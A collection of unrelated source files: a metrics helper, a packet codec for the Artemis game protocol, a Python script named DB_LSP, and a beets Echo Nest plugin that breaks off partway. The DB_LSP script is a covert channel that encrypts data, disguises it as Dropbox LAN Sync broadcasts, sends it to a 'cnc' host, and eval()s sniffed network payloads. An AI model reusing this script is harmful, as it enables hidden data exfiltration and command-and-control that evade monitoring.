overlap_df = match_detected_annotations(y, y_pred, method=method)
# get the indices from the match event overlap output
y_true_series = overlap_df['true_index']
y_pred_series = overlap_df['pred_index']
tp, fp, fn = _calculate_match_stats(ytrue_indices=y_true_series,
ypred_indices=y_pred_series)
return tp, fp, fn
def _calculate_match_stats(ytrue_indices, ypred_indices):
"""
Calculate true positives, false positives, and false negatives.
True negatives cannot be calculated for this dataset as of now.
Parameters
----------
ytrue_indices : pd.Series
Pandas Series with a number corresponding to an index and a
``nan`` if there is no match.
ypred_indices : pd.Series
Pandas Series with a number corresponding to an index and a
``nan`` if there is no match.
Returns
-------
tp: int
number of true positives - i.e. prediction and actual are both true
fp: int
number of false positives - i.e. prediction is true and actual is false
fn: int
number of false negatives - i.e. prediction is false and actual is true
"""
# Convert the match df structure to two lists of booleans.
# (True) and negatives (False).
# True if an index is present, False if Nan
y_true_bool = ytrue_indices.notna().to_list()
y_pred_bool = ypred_indices.notna().to_list()
# compute true positive, false positive and false negative
label_pairs = tuple(zip(y_true_bool, y_pred_bool))
tp = np.sum([(t and p) for t, p in label_pairs])
fp = np.sum([(p and not t) for t, p in label_pairs])
fn = np.sum([(t and not p) for t, p in label_pairs])
return tp, fp, fn
|
<reponame>nhammond129/libdiana
import struct
import sys
import math
from .encoding import encode as base_pack, decode as unpack
from .object_update import decode_obj_update_packet
from .enumerations import *
def pack(fmt, *args):
return base_pack(fmt, args)
class SoftDecodeFailure(RuntimeError):
pass
PACKETS = {}
def packet(n):
def wrapper(cls):
PACKETS[n] = cls
cls.packet_id = n
return cls
return wrapper
class UndecodedPacket:
def __init__(self, packet_id, data):
self.packet_id = packet_id
self.data = data
def encode(self):
return self.data
@classmethod
def decode(cls, data):
return cls(0, data)
def __str__(self):
return "<UndecodedPacket id=0x{0:08x} data={1!r}>".format(self.packet_id, self.data)
@packet(0x6d04b3da)
class WelcomePacket:
def __init__(self, message=''):
self.message = message
def encode(self):
encoded_message = self.message.encode('ascii')
return struct.pack('<I', len(encoded_message)) + encoded_message
@classmethod
def decode(cls, packet):
string_length, = struct.unpack('<I', packet[:4])
decoded_message = packet[4:].decode('ascii')
if string_length != len(decoded_message):
raise ValueError('String length inconsistent with decoded length (should be {}, actually {})'.format(len(decoded_message), string_length))
return cls(decoded_message)
def __str__(self):
return "<WelcomePacket {0!r}>".format(self.message)
@packet(0xe548e74a)
class VersionPacket:
def __init__(self, major, minor, patch):
self.major = major
self.minor = minor
self.patch = patch
def encode(self):
return pack('IfIII', 0,
float('{}.{}'.format(self.major, self.minor)),
self.major, self.minor, self.patch)
@classmethod
def decode(cls, packet):
unknown_1, legacy_version, major, minor, patch = unpack('IfIII', packet)
return cls(major, minor, patch)
def __str__(self):
return "<VersionPacket {}.{}.{}>".format(self.major, self.minor, self.patch)
@packet(0x3de66711)
class DifficultyPacket:
def __init__(self, difficulty, game_type):
self.difficulty = difficulty
self.game_type = game_type
def encode(self):
return pack('II', self.difficulty, self.game_type.value)
@classmethod
def decode(cls, packet):
difficulty, game_type_raw = unpack('II', packet)
return cls(difficulty, GameType(game_type_raw))
def __str__(self):
return "<DifficultyPacket difficulty={} game_type={}>".format(self.difficulty, self.game_type)
@packet(0x19c6e2d4)
class ConsoleStatusPacket:
def __init__(self, ship, consoles):
self.consoles = {key: consoles.get(key, ConsoleStatus.available) for key in Console}
self.ship = ship
def encode(self):
return pack('I[B]', self.ship,
[(self.consoles[console].value,) for console in Console])
@classmethod
def decode(cls, packet):
ship, body = unpack('I[B]', packet)
body = [x[0] for x in body]
if len(body) != len(Console):
raise ValueError("Incorrect console count ({}, should be {})".format(len(body), len(Console)))
consoles = {console: ConsoleStatus(body[console.value]) for console in Console}
return cls(ship, consoles)
def __str__(self):
return '<ConsoleStatusPacket ship={0} consoles={1!r}>'.format(self.ship,
{console: status
for console, status in self.consoles.items()
if status != ConsoleStatus.available})
@packet(0xf5821226)
class HeartbeatPacket:
def encode(self):
return b''
@classmethod
def decode(cls, packet):
if packet != b'':
raise ValueError('Payload in heartbeat')
return cls()
def __str__(self):
return "<HeartbeatPacket>"
@packet(0xee665279)
class IntelPacket:
def __init__(self, object, intel):
self.object = object
self.intel = intel
def encode(self):
return pack('Ibu', self.object, 3, self.intel)
@classmethod
def decode(cls, packet):
object, _unk, intel = unpack('Ibu', packet)
return cls(object, intel)
def __str__(self):
return '<IntelPacket object={0} intel={1!r}>'.format(self.object, self.intel)
@packet(0xd672c35f)
class CommsIncomingPacket:
def __init__(self, priority, sender, message):
self.priority = priority
self.sender = sender
self.message = message
def encode(self):
return pack('Suu', self.priority, self.sender, self.message.replace('\n', '^'))
@classmethod
def decode(cls, packet):
prio, sender, message = unpack('Suu', packet)
return cls(prio, sender, message.replace('^', '\n'))
def __str__(self):
return '<CommsIncomingPacket priority={0} sender={1!r} message={2!r}>'.format(self.priority, self.sender, self.message)
@packet(0x80803df9)
class ObjectUpdatePacket:
def __init__(self, raw_data):
self.raw_data = raw_data
@property
def _records(self):
return decode_obj_update_packet(self.raw_data)
@property
def records(self):
try:
return self._records
except Exception:
return []
@classmethod
def decode(cls, packet):
if packet == b'\x00\x00\x00\x00':
return NoisePacket()
return cls(packet)
def encode(self):
return self.raw_data
def __str__(self):
try:
records = repr(self._records)
return '<ObjectUpdatePacket records={}>'.format(records)
except Exception as e:
return '<ObjectUpdatePacket data={0!r} error={1!r}>'.format(self.raw_data, e)
class NoisePacket:
def __init__(self):
self.packet_id = 0x80803df9
def encode(self):
return b'\x00\x00\x00\x00'
def __str__(self):
return '<NoisePacket>'
@packet(0xcc5a3e30)
class DestroyObjectPacket:
def __init__(self, type, object):
self.type = type
self.object = object
def encode(self):
return pack('BI', self.type.value, self.object)
@classmethod
def decode(cls, packet):
type, object = unpack('BI', packet)
return cls(type=ObjectType(type), object=object)
def __str__(self):
return '<DestroyObjectPacket type={0!r} object={1!r}>'.format(self.type, self.object)
@packet(0xf754c8fe)
class GameMessagePacket:
@classmethod
def decode(cls, packet):
if not packet:
raise ValueError('No payload in game message')
subtype_index = packet[0]
if subtype_index == 0:
return GameStartPacket.decode(packet)
if subtype_index == 6:
return GameEndPacket.decode(packet)
if subtype_index == 9:
return SkyboxPacket.decode(packet)
if subtype_index == 10:
return PopupPacket.decode(packet)
if subtype_index == 11:
return AutonomousDamconPacket.decode(packet)
if subtype_index == 12:
return JumpStartPacket.decode(packet)
if subtype_index == 13:
return JumpEndPacket.decode(packet)
if subtype_index == 15:
return AllShipSettingsPacket.decode(packet)
if subtype_index == 16:
return DmxPacket.decode(packet)
raise SoftDecodeFailure()
class GameStartPacket(GameMessagePacket):
def encode(self):
return b'\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00'
@classmethod
def decode(cls, packet):
if len(packet) != 12:
raise ValueError('Wrong packet length')
return cls()
def __str__(self):
return '<GameStartPacket>'
class GameEndPacket(GameMessagePacket):
def encode(self):
return b'\x06\x00\x00\x00'
@classmethod
def decode(cls, packet):
if len(packet) != 4:
raise ValueError('Wrong packet length')
return cls()
def __str__(self):
return '<GameEndPacket>'
class AllShipSettingsPacket(GameMessagePacket):
def __init__(self, ships):
self.ships = list(ships)
if len(self.ships) != 8:
raise ValueError('Must be 8 ships, {} given'.format(len(self.ships)))
def encode(self):
return pack('I[IIIu]', 15,
[(ship.drive.value, ship.type.value, 1, ship.name)
for ship in self.ships])
@classmethod
def decode(cls, packet):
_id, records = unpack('I[IIfIu]', packet)
return cls(ShipSettingsRecord(DriveType(drv), ShipType(typ), name)
for drv, typ, _accent, _what, name in records)
def __str__(self):
return '<AllShipSettingsPacket settings={0!r}>'.format(self.ships)
class JumpStartPacket(GameMessagePacket):
def encode(self):
return b'\x0c\x00\x00\x00'
@classmethod
def decode(cls, packet):
if len(packet) != 4:
raise ValueError('Wrong packet length')
return cls()
def __str__(self):
return '<JumpStartPacket>'
class JumpEndPacket(GameMessagePacket):
def encode(self):
return b'\x0d\x00\x00\x00'
@classmethod
def decode(cls, packet):
if len(packet) != 4:
raise ValueError('Wrong packet length')
return cls()
def __str__(self):
return '<JumpEndPacket>'
class DmxPacket(GameMessagePacket):
def __init__(self, flag, state):
self.flag = flag
self.state = state
def encode(self):
return pack('IuI', 0x10, self.flag, int(self.state))
@classmethod
def decode(cls, packet):
_id, flag, state = unpack('IuI', packet)
return cls(flag, state)
def __str__(self):
return '<DmxPacket flag={0!r} state={1!r}>'.format(self.flag, self.state)
class SkyboxPacket(GameMessagePacket):
def __init__(self, skybox):
self.skybox = skybox
def encode(self):
return pack('II', 9, self.skybox)
@classmethod
def decode(cls, packet):
_id, skybox = unpack('II', packet)
return cls(skybox)
def __str__(self):
return '<SkyboxPacket skybox={0!r}>'.format(self.skybox)
class PopupPacket(GameMessagePacket):
def __init__(self, message):
self.message = message
def encode(self):
return pack('Iu', 0x0a, self.message)
@classmethod
def decode(cls, packet):
_id, message = unpack('Iu', packet)
return cls(message)
def __str__(self):
return '<PopupPacket message={0!r}>'.format(self.message)
class AutonomousDamconPacket(GameMessagePacket):
def __init__(self, autonomy):
self.autonomy = autonomy
def encode(self):
return pack('II', 0x0b, int(self.autonomy))
@classmethod
def decode(cls, packet):
_id, autonomy = unpack('II', packet)
return cls(bool(autonomy))
def __str__(self):
return '<AutonomousDamconPacket autonomy={0!r}>'.format(self.autonomy)
@packet(0x4c821d3c)
class ShipAction1Packet:
@classmethod
def decode(cls, packet):
if not packet:
raise ValueError('No payload in game message')
subtype_index = packet[0]
if subtype_index == 0:
return HelmSetWarpPacket.decode(packet)
if subtype_index == 1:
return SetMainScreenPacket.decode(packet)
if subtype_index == 2:
return SetWeaponsTargetPacket.decode(packet)
if subtype_index == 3:
return ToggleAutoBeamsPacket.decode(packet)
if subtype_index == 4:
return ToggleShieldsPacket.decode(packet)
if subtype_index == 7:
return HelmRequestDockPacket.decode(packet)
if subtype_index == 10:
return ToggleRedAlertPacket.decode(packet)
if subtype_index == 11:
return SetBeamFreqPacket.decode(packet)
if subtype_index == 13:
return SetShipPacket.decode(packet)
if subtype_index == 14:
return SetConsolePacket.decode(packet)
if subtype_index == 15:
return ReadyPacket.decode(packet)
if subtype_index == 16:
return SciSelectPacket.decode(packet)
if subtype_index == 17:
return CaptainSelectPacket.decode(packet)
if subtype_index == 18:
return GameMasterSelectPacket.decode(packet)
if subtype_index == 19:
return SciScanPacket.decode(packet)
if subtype_index == 22:
return SetShipSettingsPacket.decode(packet)
if subtype_index == 24:
return HelmToggleReversePacket.decode(packet)
if subtype_index == 25:
return Ready2Packet.decode(packet)
if subtype_index == 26:
return TogglePerspectivePacket.decode(packet)
if subtype_index == 27:
return ClimbDivePacket.decode(packet)
raise SoftDecodeFailure()
class SciScanPacket(ShipAction1Packet):
def __init__(self, target):
self.target = target
def encode(self):
return pack('II', 19, self.target)
@classmethod
def decode(cls, packet):
_idx, tgt = unpack('II', packet)
return cls(tgt)
def __str__(self):
return "<SciScanPacket target={0!r}>".format(self.target)
class CaptainSelectPacket(ShipAction1Packet):
def __init__(self, object):
self.object = object
def encode(self):
if self.object is not None:
return pack('II', 17, self.object)
else:
return pack('II', 17, 1)
@classmethod
def decode(cls, packet):
_idx, tgt = unpack('II', packet)
if tgt != 1:
return cls(tgt)
else:
return cls(None)
def __str__(self):
return "<CaptainSelectPacket object={0!r}>".format(self.object)
class GameMasterSelectPacket(ShipAction1Packet):
def __init__(self, object):
self.object = object
def encode(self):
if self.object is not None:
return pack('II', 18, self.object)
else:
return pack('II', 18, 1)
@classmethod
def decode(cls, packet):
_idx, tgt = unpack('II', packet)
if tgt != 1:
return cls(tgt)
else:
return cls(None)
def __str__(self):
return "<GameMasterSelectPacket object={0!r}>".format(self.object)
class SciSelectPacket(ShipAction1Packet):
def __init__(self, object):
self.object = object
def encode(self):
if self.object is not None:
return pack('II', 16, self.object)
else:
return pack('II', 16, 1)
@classmethod
def decode(cls, packet):
_idx, tgt = unpack('II', packet)
if tgt != 1:
return cls(tgt)
else:
return cls(None)
def __str__(self):
return "<SciSelectPacket object={0!r}>".format(self.object)
class SetWeaponsTargetPacket(ShipAction1Packet):
def __init__(self, object):
self.object = object
def encode(self):
if self.object is not None:
return pack('II', 2, self.object)
else:
return pack('II', 2, 1)
@classmethod
def decode(cls, packet):
_idx, tgt = unpack('II', packet)
if tgt != 1:
return cls(tgt)
else:
return cls(None)
def __str__(self):
return "<SetWeaponsTargetPacket object={0!r}>".format(self.object)
class SetBeamFreqPacket(ShipAction1Packet):
def __init__(self, freq):
self.freq = freq
def encode(self):
return pack('II', 11, self.freq)
@classmethod
def decode(cls, packet):
_idx, freq = unpack('II', packet)
return cls(freq)
def __str__(self):
return "<SetBeamFreqPacket freq={}>".format(self.freq)
class HelmToggleReversePacket(ShipAction1Packet):
def encode(self):
return b'\x18\x00\x00\x00\x00\x00\x00\x00'
@classmethod
def decode(cls, packet):
if packet != b'\x18\x00\x00\x00\x00\x00\x00\x00':
raise ValueError('Unexpected payload in reverse packet')
return cls()
def __str__(self):
return '<HelmToggleReversePacket>'
class ReadyPacket(ShipAction1Packet):
def encode(self):
return b'\x0f\x00\x00\x00\x00\x00\x00\x00'
@classmethod
def decode(cls, packet):
if packet != b'\x0f\x00\x00\x00\x00\x00\x00\x00':
raise ValueError('Unexpected payload in ready packet')
return cls()
def __str__(self):
return '<ReadyPacket>'
class Ready2Packet(ShipAction1Packet):
def encode(self):
return b'\x19\x00\x00\x00\x00\x00\x00\x00'
@classmethod
def decode(cls, packet):
if packet != b'\x19\x00\x00\x00\x00\x00\x00\x00':
raise ValueError('Unexpected payload in ready2 packet')
return cls()
def __str__(self):
return '<Ready2Packet>'
class SetShipSettingsPacket(ShipAction1Packet):
def __init__(self, drive, type, name):
self.drive = drive
self.type = type
self.name = name
def encode(self):
return pack('IIIIu', 0x16, self.drive.value, self.type.value, 1, self.name)
@classmethod
def decode(cls, packet):
_id, drv, typ, _unk, name = unpack('IIIIu', packet)
return cls(drive=DriveType(drv),
type=ShipType(typ),
name=name)
def __str__(self):
return '<SetShipSettingsPacket drive={0!r} type={1!r} name={2!r}>'.format(self.drive, self.type, self.name)
class HelmRequestDockPacket(ShipAction1Packet):
def encode(self):
return b'\x07\x00\x00\x00\x00\x00\x00\x00'
@classmethod
def decode(cls, data):
if data != b'\x07\x00\x00\x00\x00\x00\x00\x00':
raise SoftDecodeFailure()
return cls()
def __str__(self):
return '<HelmRequestDockPacket>'
class ToggleShieldsPacket(ShipAction1Packet):
def encode(self):
return b'\x04\x00\x00\x00\x00\x00\x00\x00'
@classmethod
def decode(cls, data):
if data != b'\x04\x00\x00\x00\x00\x00\x00\x00':
raise SoftDecodeFailure()
return cls()
def __str__(self):
return '<ToggleShieldsPacket>'
class ToggleRedAlertPacket(ShipAction1Packet):
def encode(self):
return b'\x0a\x00\x00\x00\x00\x00\x00\x00'
@classmethod
def decode(cls, data):
if data != b'\x0a\x00\x00\x00\x00\x00\x00\x00':
raise SoftDecodeFailure()
return cls()
def __str__(self):
return '<ToggleRedAlertPacket>'
class ToggleAutoBeamsPacket(ShipAction1Packet):
def encode(self):
return b'\x03\x00\x00\x00\x00\x00\x00\x00'
@classmethod
def decode(cls, data):
if data != b'\x03\x00\x00\x00\x00\x00\x00\x00':
raise SoftDecodeFailure()
return cls()
def __str__(self):
return '<ToggleAutoBeamsPacket>'
class TogglePerspectivePacket(ShipAction1Packet):
def encode(self):
return b'\x1a\x00\x00\x00\x00\x00\x00\x00'
@classmethod
def decode(cls, data):
if data != b'\x1a\x00\x00\x00\x00\x00\x00\x00':
raise SoftDecodeFailure()
return cls()
def __str__(self):
return '<TogglePerspectivePacket>'
class ClimbDivePacket(ShipAction1Packet):
def __init__(self, direction):
self.direction = direction
def encode(self):
return pack('Ii', 27, self.direction)
@classmethod
def decode(cls, packet):
_id, direction = unpack('Ii', packet)
return cls(direction)
def __str__(self):
return "<ClimbDivePacket direction={0!r}>".format(self.direction)
class SetMainScreenPacket(ShipAction1Packet):
def __init__(self, screen):
self.screen = screen
def encode(self):
return pack('II', 1, self.screen.value)
@classmethod
def decode(cls, packet):
_idx, screen_id = unpack('II', packet)
return cls(MainView(screen_id))
def __str__(self):
return "<SetMainScreenPacket screen={0!r}>".format(self.screen)
class SetConsolePacket(ShipAction1Packet):
def __init__(self, console, selected):
self.console = console
self.selected = selected
def encode(self):
return pack('III', 0x0e, self.console.value, 1 if self.selected else 0)
@classmethod
def decode(cls, packet):
_idx, console_id, selected = unpack('III', packet)
return cls(Console(console_id), bool(selected))
def __str__(self):
return "<SetConsolePacket console={0!r} selected={1!r}>".format(self.console, self.selected)
class HelmSetWarpPacket(ShipAction1Packet):
def __init__(self, warp):
self.warp = warp
def encode(self):
return pack('II', 0, self.warp)
@classmethod
def decode(cls, packet):
_idx, warp = unpack('II', packet)
return cls(warp)
def __str__(self):
return "<HelmSetWarpPacket warp={}>".format(self.warp)
class SetShipPacket(ShipAction1Packet):
def __init__(self, ship):
self.ship = ship
def encode(self):
return pack('II', 0x0d, self.ship)
@classmethod
def decode(cls, packet):
_idx, ship = unpack('II', packet)
return cls(ship)
def __str__(self):
return "<SetShipPacket ship={}>".format(self.ship)
@packet(0x0351a5ac)
class ShipAction3Packet:
@classmethod
def decode(cls, packet):
if not packet:
raise ValueError('No payload in game message')
subtype_index = packet[0]
if subtype_index == 0:
return HelmSetImpulsePacket.decode(packet)
if subtype_index == 1:
return HelmSetSteeringPacket.decode(packet)
if subtype_index == 5:
return HelmJumpPacket.decode(packet)
raise SoftDecodeFailure()
class HelmSetSteeringPacket(ShipAction3Packet):
def __init__(self, rudder):
self.rudder = rudder
def encode(self):
return pack('If', 1, self.rudder)
@classmethod
def decode(cls, packet):
_idx, rudder = unpack('If', packet)
return cls(rudder)
def __str__(self):
return '<HelmSetSteeringPacket rudder={0!r}>'.format(self.rudder)
class HelmSetImpulsePacket(ShipAction3Packet):
def __init__(self, impulse):
self.impulse = impulse
def encode(self):
return pack('If', 0, self.impulse)
@classmethod
def decode(cls, packet):
_idx, impulse = unpack('If', packet)
return cls(impulse)
def __str__(self):
return '<HelmSetImpulsePacket impulse={0!r}>'.format(self.impulse)
class HelmJumpPacket(ShipAction3Packet):
def __init__(self, bearing, distance):
self.bearing = bearing
self.distance = distance
def encode(self):
return pack('Iff', 5, self.bearing / (math.pi * 2), self.distance / 50)
@classmethod
def decode(cls, packet):
_idx, bearing, distance = unpack('Iff', packet)
return cls(bearing * (math.pi * 2), distance * 50)
def __str__(self):
return '<HelmJumpPacket bearing={0!r} distance={1!r}>'.format(self.bearing, self.distance)
@packet(0xb83fd2c4)
class BeamFiredPacket:
def __init__(self, object, port, origin, target, x, y, z, auto):
self.object = object
self.port = port
self.origin = origin
self.target = target
self.x = x
self.y = y
self.z = z
self.auto = auto
def encode(self):
return pack('IIIIIIIIIfffI',
self.object, 1, 1200,
self.port,
1, 1, 0,
self.origin, self.target,
self.x, self.y, self.z,
0 if self.auto else 1)
@classmethod
def decode(cls, packet):
object, _unk1, _unk2, port, origintype, targettype, _unk3, origin, target, x, y, z, auto = unpack('IIIIIIIIIfffI', packet)
return cls(object, port, origin, target, x, y, z, [True, False][auto])
def __str__(self):
return '<BeamFiredPacket object={object} port={port} origin={origin} target={target} position=({x}, {y}, {z}) automatic={auto!r}>'.format(**self.__dict__)
def encode(packet, provenance=PacketProvenance.client):
encoded_block = packet.encode()
block_len = len(encoded_block)
return (struct.pack('<IIIIII',
0xdeadbeef,
24 + block_len,
provenance.value,
0x00,
4 + block_len,
packet.packet_id) + encoded_block)
def decode(packet, provenance=PacketProvenance.server): # returns packets, trail
if not packet:
return [], b''
de_index = packet.find(0xef)
if de_index > 0:
sys.stderr.write("WARNING: skipping {} bytes of stream to resync\n".format(de_index))
sys.stderr.flush()
packet = packet[de_index:]
elif de_index == -1:
# wtf?
return [], b''
buffer_len = len(packet)
if buffer_len < 24:
return [], packet
header, packet_len, origin, padding, remaining, ptype = struct.unpack('<IIIIII', packet[:24])
if header != 0xdeadbeef:
raise ValueError("Incorrect packet header")
if packet_len < 24:
raise ValueError("Packet too short")
if origin != provenance.value:
raise ValueError("Incorrect packet origin field")
if remaining != packet_len - 20:
raise ValueError("Inconsistent packet length fields")
if buffer_len < packet_len:
return [], packet
trailer = packet[packet_len:]
payload = packet[24:packet_len]
rest, trailer = decode(trailer)
try:
if ptype in PACKETS:
# we know how to decode this one
return [PACKETS[ptype].decode(payload)] + rest, trailer
else:
raise SoftDecodeFailure()
except SoftDecodeFailure: # meaning unhandled bits
return [UndecodedPacket(ptype, payload)] + rest, trailer
|
#!/usr/bin/python
import os
import sys
import csv
import json
import socket
import base64
import hashlib
import threading
from scapy.all import *
from Crypto import Random
from Crypto.Cipher import AES
from StringIO import StringIO
PROMPT = "DB_LSP > "
counter = 0 # Create a Packet Counter
class AESCipher(object):
def __init__(self, key):
self.bs = 32
self.key = hashlib.sha256(key.encode()).digest()
def encrypt(self, raw):
raw = self._pad(raw)
iv = Random.new().read(AES.block_size)
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return base64.b64encode(iv + cipher.encrypt(raw))
def decrypt(self, enc):
enc = base64.b64decode(enc)
iv = enc[:AES.block_size]
cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')
def _pad(self, s):
return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)
@staticmethod
def _unpad(s):
return s[:-ord(s[len(s)-1:])]
class mydict(dict):
"""
This is here to avoid Python converting the dict to a single quote JSON rather than a double quote JSON. This might sound useless, but will make a lot of capture instrucments display the packet in a very diffrent manner nor identifying it as a JSON and therefore creating something which is very easy to discover.
Thanks to https://stackoverflow.com/questions/18283725/how-to-create-a-python-dictionary-with-double-quotes-as-default-quote-format
"""
def __str__(self):
return json.dumps(self)
class DB_LSP(object):
def __init__(self, cnc, data, key, port=17500):
self.cnc = cnc
self.port = port
self.address = (self.cnc, self.port)
self.data = data
self.DEFAULT_STRUCT = {
"host_int": 123456,
"versions": [2, 0],
"displayname": "",
"port": self.port,
"namespaces": [1, 2, 3]
}
self.payload = ""
self.AES = AESCipher(key=key)
def _Create(self):
this_data = self.DEFAULT_STRUCT
this_data['host_int'] = self.AES.encrypt(raw=self.data)
self.payload = str(mydict(this_data))
def Send(self):
# Try to create socket
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if ".255" in self.address[0]:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
else:
s.bind(('', self.port))
except socket.error, e:
sys.stderr.write('Failed to create socket.\n')
sys.stderr.write('%s\n' % e)
return False
try:
s.sendto(self.payload, self.address)
sys.stdout.write("%s bytes sent to %s.\n" % (len(self.payload), self.address))
except:
sys.stderr.write("Error sending message to %s.\n" % str(self.address))
return False
return True
def SniffAndDecode(key, host, port=17500):
AESProvider = AESCipher(key=key)
def custom_action(packet):
global counter
counter += 1
if packet[0][1].src == host:
if packet[0][UDP].sport == port:
try:
message = str(packet[0][UDP].payload).strip()
jdump = eval(message)
except:
sys.stderr.write("Got message from the right IP on the write port but it does not look like a DB-LSP message.\n")
sys.stderr.flush()
return
try:
mess = AESProvider.decrypt(enc=jdump['host_int'].strip())
sys.stdout.write("\n\t%s -> %s\n" % (host, mess))
sys.stdout.flush()
return
except:
sys.stderr.write("Message was recevived but not decrypted.\n")
sys.stderr.flush()
return
else:
return
## Setup sniff, filtering for IP traffic
sys.stdout.write("Starting listener for %s.\n" % host)
sniff(filter="udp", prn=custom_action)
def SniffWrapper(key, host, port=17500):
th = threading.Thread(target=SniffAndDecode, args=(key, host, port))
th.start()
return th
def StartShell():
params = {}
active = False
_help()
while True:
if active:
sys.stdout.write(params['server']+'@'+PROMPT)
else:
sys.stdout.write(PROMPT)
try:
command = raw_input()
except:
sys.stderr.write("Whhhat?\n")
continue
if command.strip() == "exit" or command.strip() == "quit":
if active:
params['thread']._Thread__stop()
sys.stdout.write("Thanks and see you soon.\n")
sys.exit()
if command.strip() == "help":
_help()
continue
if " " in command.strip():
data = StringIO(command)
reader = csv.reader(data, delimiter=' ')
for row in reader:
split_command = row
if split_command[0] == "send":
# Check that a key was set.
try:
a = key=params['key']
except:
sys.stderr.write("Please set a key with 'set key P@$$WorD!'.\n")
continue
if not active:
if len(split_command) == 3:
dbObj = DB_LSP(cnc=split_command[2], data=split_command[1], key=params['key'])
dbObj._Create()
dbObj.Send()
else:
sys.stderr.write("Please use 'send \"this is data\" 8.8.8.8'.\n")
else:
if len(split_command) == 2:
dbObj = DB_LSP(cnc=params['server'], data=split_command[1], key=params['key'])
dbObj._Create()
dbObj.Send()
else:
sys.stderr.write("Please use 'send \"this is data\"' since you're in active mode.\n")
elif split_command[0] == "set":
if len(split_command) == 3:
params[split_command[1]] = split_command[2]
sys.stdout.write(" %s --> %s.\n" % (split_command[1], split_command[2]))
else:
sys.stderr.write("Please use 'set param value'.\n")
elif split_command[0] == "show":
if split_command[1] == "params":
sys.stdout.write(str(params) + "\n")
else:
sys.stderr.write("I don't know what to show you.\n")
elif split_command[0] == "active":
try:
a = params['listener']
except:
sys.stderr.write("Please set a listener (where messages will be coming from) with 'set listener 127.0.0.1'.\n")
continue
try:
a = key=params['key']
except:
sys.stderr.write("Please set a key with 'set key P@$$WorD!'.\n")
continue
sys.stdout.write("Starting active mode with %s.\n" % split_command[1])
thread = SniffWrapper(key=params['key'], host=params['listener'])
params['thread'] = thread
active = True
params['server'] = split_command[1]
elif split_command[0] == "deactivate":
sys.stdout.write("Deactivating.\n")
params['thread']._Thread__stop()
active = False
else:
pass
def _help():
help_text = """
To communicate between two hosts over broadcast you will need:
\t1) Setup an ecnryption key whichi will be identical on both hosts.
\t\tset key 123456
\t2) Know which host is going to broadcast the message:
\t\tset listener 10.0.0.1
\t3) Start active mode:
\t\tactive 10.0.0.255
Now just send messages with:
\tsend "hello world"
"""
print(help_text)
if __name__ == "__main__":
StartShell()
"""
# Constant Sniff and Decode :
SniffAndDecode(key="123456", host="OtherIP", port=17500)
# Send a message:
obj = DB_LSP(key="123456", data="Hello World", host="192.168.0.255", port=17500)
obj.Send()
"""
|
<filename>beetsplug/echonest.py
# This file is part of beets.
# Copyright 2013, <NAME>.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Fetch a variety of acoustic metrics from The Echo Nest.
"""
import time
import logging
import socket
import os
import tempfile
from string import Template
import subprocess
from beets import util, config, plugins, ui
from beets.dbcore import types
import pyechonest
import pyechonest.song
import pyechonest.track
log = logging.getLogger('beets')
# If a request at the EchoNest fails, we want to retry the request RETRIES
# times and wait between retries for RETRY_INTERVAL seconds.
RETRIES = 10
RETRY_INTERVAL = 10
DEVNULL = open(os.devnull, 'wb')
ALLOWED_FORMATS = ('MP3', 'OGG', 'AAC')
UPLOAD_MAX_SIZE = 50 * 1024 * 1024
# FIXME: use avconv?
CONVERT_COMMAND = u'ffmpeg -i $source -y -acodec libvorbis -vn -aq 2 $dest'
TRUNCATE_COMMAND = u'ffmpeg -t 300 -i $source'\
u'-y -acodec libvorbis -vn -aq 2 $dest'
# Maps attribute names from echonest to their field names in beets.
# The attributes are retrieved from a songs `audio_summary`. See:
# http://echonest.github.io/pyechonest/song.html#pyechonest.song.profile
ATTRIBUTES = {
'energy': 'energy',
'liveness': 'liveness',
'speechiness': 'speechiness',
'acousticness': 'acousticness',
'danceability': 'danceability',
'valence': 'valence',
'tempo': 'bpm',
}
# Types for the flexible fields added by `ATTRIBUTES`
FIELD_TYPES = {
'energy': types.FLOAT,
'liveness': types.FLOAT,
'speechiness': types.FLOAT,
'acousticness': types.FLOAT,
'danceability': types.FLOAT,
'valence': types.FLOAT,
}
MUSICAL_SCALE = ['C', 'C#', 'D', 'D#', 'E' 'F',
'F#', 'G', 'G#', 'A', 'A#', 'B']
# We also use echonest_id (song_id) and echonest_fingerprint to speed up
# lookups.
ID_KEY = 'echonest_id'
FINGERPRINT_KEY = 'echonest_fingerprint'
def _splitstrip(string, delim=u','):
"""Split string (at commas by default) and strip whitespace from the
pieces.
"""
return [s.strip() for s in string.split(delim)]
def diff(item1, item2):
"""Score two Item objects according to the Echo Nest numerical
fields.
"""
result = 0.0
for attr in ATTRIBUTES.values():
if attr == 'bpm':
# BPM (tempo) is handled specially to normalize.
continue
try:
result += abs(
float(item1.get(attr, None)) -
float(item2.get(attr, None))
)
except TypeError:
result += 1.0
try:
bpm1 = float(item1.get('bpm', None))
bpm2 = float(item2.get('bpm', None))
result += abs(bpm1 - bpm2) / max(bpm1, bpm2, 1)
except TypeError:
result += 1.0
return result
def similar(lib, src_item, threshold=0.15, fmt='${difference}: ${path}'):
for item in lib.items():
if item.path != src_item.path:
d = diff(item, src_item)
if d < threshold:
s = fmt.replace('${difference}', '{:2.2f}'.format(d))
ui.print_obj(item, lib, s)
class EchonestMetadataPlugin(plugins.BeetsPlugin):
item_types = FIELD_TYPES
def __init__(self):
super(EchonestMetadataPlugin, self).__init__()
self.config.add({
'auto': True,
'apikey': u'<KEY>',
'upload': True,
'convert': True,
'truncate': True,
})
self.config.add(ATTRIBUTES)
pyechonest.config.ECHO_NEST_API_KEY = \
config['echonest']['apikey'].get(unicode)
if self.config['auto']:
self.import_stages = [self.imported]
def _echofun(self, func, **kwargs):
"""Wrapper for requests to the EchoNest API. Will retry up to
